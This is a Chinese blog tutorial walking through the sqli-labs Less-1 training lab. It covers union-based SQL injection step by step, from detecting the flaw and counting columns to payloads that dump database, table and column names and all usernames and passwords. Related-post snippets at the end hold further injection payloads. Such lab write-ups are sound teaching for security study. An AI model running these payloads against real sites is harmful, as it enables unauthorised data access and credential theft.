sqli-libs less1(union 字符注入)

最新推荐文章于 2024-07-29 16:48:37 发布
最新推荐文章于 2024-07-29 16:48:37 发布
阅读量271 收藏 1
点赞数
分类专栏: SQL注入 文章标签: 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42728957/article/details/110946963
版权

打开后,提示输入id并赋值在这里插入图片描述

1、寻找注入点

输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞
在这里插入图片描述
在这里插入图片描述
根据报错信息,猜想输入参数的值被放到一对单引号之间。

猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测):

SELECT * FROM users WHERE id='$id' LIMIT 0,1

2、order by 查询该数据表中的字段数量

输入?id=1’ order by 3 --+ 正常;
输入?id=1’ order by 4 --+ 报错,说明该数据表中字段数为3。

在这里插入图片描述
在这里插入图片描述
3、爆破数据库
测试出一共有几列数据之后,改变语句:?id=-1 union select 1,2,3 --+
语句解析:

  • id = -1 --联合查询后两个查询结构合并输出。但是这个结果只能显示第一个,因此需要让前一个查询结果为空值。
  • union --联合查询
  • select 1,2,3 – 利用1,2,3 测试出数据返回的数据在页面的位置
    可以看到只有2,3在页面出现,因此可以使用2,3这两个位置。
    构造字符串查询数据库名、表名、列名、字段信息。
    从information_schema中获取所有的数据库名:
?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述
从information_schema中获取security所有表名:

?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

在这里插入图片描述
从 information_schema中获取列

?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_name='users'),3 --+

在这里插入图片描述
查询所有用户名和密码
?id=-1’ union select 1,(select group_concat(username) from security.users ), (select group_concat(password) from security.users) --+
在这里插入图片描述
爆破成功!
知识点:
(1)在MySQL 5.0版本之后,MySQL默认在数据库中存放一个“information_schema”的数据库,在该库中,我们需要记住三个表名,分别是schemata、tables和colums。

  • schemata表存储该用户创建的所有数据库的库名,我们需要记住该表中记录数据库库名的字段名为schema_name。
  • tables表存储该用户创建的所有数据库的库名和表名,我们需要记住该表中记录数据库库名和表名的字段名分别为table_schema和table_name。
  • columns表存储该用户创建的所有数据库的库名、表名和字段名,我们需要记住该表中记录数据库库名、表名和字段名的字段名为table_schema、table_name 和column_name.
    (2)group_concat函数是典型的字符串连接函数。group_concat(table_name)表示把table_name字段的值打印在一行,逗号分隔(默认)。
    (3)–+中,“–”是SQL查询语句中的注释符,“+”在URL中表示空格。
橘子就酱
关注
专栏目录
SQL练习(less-2)报错注入
AmyBaby00的博客
08-13 461
固定格式: Updatexml(1,concat(0×7e,b) Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 构造语句:union select updatexml(1,concat(0x7e,select database(),0x7e),1) http:/...
sqli-libs------less1-less8
qq_46116117的博客
01-05 2433
sqli-libs sql注入思路 判读是否存在注入–判断注入类型–猜解字段数–查看输出字段位置–尝试爆出数据 获取数据库名–获取表名–获取列名–获取数据 less–1 页面让我们输入一个id值 我们用get的请求方式输入看看 测试这里是否有注入点 ?id=1' 出现报错情况,说明这里有注入点 判断注入类型 ?id=1' and 1=1--+ 为正常页面 ?id=1' and 1=2--+ 页面显示不正常 则为,字符注入 猜测他的查询语句为 select *from * where ID=
sqli-libs-less1
01mx的博客
03-18 159
sqli1
ctfhub 整数型注入
plant1234的博客
06-16 1014
整数型注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
整数型SQL注入
qq_69100706的博客
07-29 209
在CTF(Capture The Flag)竞赛中,整数型SQL注入是一种常见的挑战类型,尤其是在Web安全类的任务中。整数型注入发生在应用程序接受数字输入时,没有正确地验证或清理输入数据,导致恶意构造的数字可以被解释为SQL语句的一部分,从而执行额外的数据库查询。
SQL注入】整数型注入
noob_3000的博客
08-07 2929
CTFHUB整数型SQL注入
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 707
继续学习sqli-labs,本篇是less 32-37
Sqli-Labs-Master】Less-5 (报错注入
Oavinci的博客
06-08 1221
Less5 单引号的注入 ?id=1' 报错 ?id=1'%23 尝试闭合,成功回显 看到这个报错信息,基本就行布尔型盲注、报错型注入、时间延迟型盲注,UNION联合查询型注入应该是不能用了。 查看源代码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql)...
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3278
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs靶场实现(八)【cookie注入+cookie base64编码注入】(less-20、less-22、具体步骤+图文详解)
weixin_46709219的博客
01-03 1150
一)cookie注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 二)cookie base64编码注入   1)cookie介绍   2)cookie注入代码分析   3)cookie注入利用   4)sqlmap安全检测 —————————————————————————————————————————————————— 一)cookie注入 1)cookie介绍: 服务器可以利用cookie包含信息的任意性来筛选并经常性的
SQL注入】Less-2错误型GET整型注入
Mitchell_Donovan的博客
03-30 310
Less-2错误型GET整型注入 什么是整形注入?可以理解位提交的URL参数为整数类型。 实验漏洞复现介绍 该实验与Less-1错误型GET单引号字符注入 区别在于,构建payload时去掉'单引号 1、爆开数据库 payload ?id=0 union select 1,2,database() --+ 2、爆开数据表 payload ?id=0 union select 1,group_concat(table_name),3 from information_schema.ta
sql注入(整数型注入
2401_82760239的博客
03-29 1102
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2619
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
[CTFHub]整数型注入(web>SQL注入
ZXW_NUDT的博客
05-12 314
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
CTFHub SQL 整数型注入
weixin_44732566的博客
02-16 3325
CTFHub SQL 整数型注入 之前那道整数型注入题改了,,,但还是一样的套路,数据库也一样,就多了一个:前端页面回显位置只有两处,而且一个正确的id回显就占了两处地方 UI界面好看了,还多了一个问题,就是前端页面一次只显示一条数据库记录 所以在payload最后加上limit x offset y 这个意思是从第y条记录开始后x条记录,y是从0开始算的 1 or 1=1 limit 1 o...
【CTF】CTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 462
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
SQL-libs Less-8
AgonYAN的博客
07-11 375
SQL-libs Less-8
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1354
整型SQL注入
sqli-libs
wl7979的博客
12-21 337
第五关 双查询注入 什么是双查询注入?简单来说其实就是一个查询语句包含一个查询语句,实际上是报错注入的一种! 这关通关的原理就在于:双注入查询需要联合和MYSQL的BUG来进行报错注入 在此之前,我们先掌握些必要的MYSQL函数: Rand() #产生0到1之间的随机小数的函数 Floor() #取整数函数 Count() #汇总函数 Group by #分组语句 Substr() #用于字符串加减 Ord() #将ascii码值转为字符 Mid() #字符串截取 Ifnull(exp1,exp2) #如
sqli-labs less-1
最新发布
08-07
"Less-1"是SQL注入实验室(sqli-labs.com)中的一个挑战任务,它是针对Web应用程序安全训练的一种常见练习,特别是针对SQL注入攻击的学习。在这个特定的实验中,用户通常需要通过提交恶意SQL查询来绕过网站的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值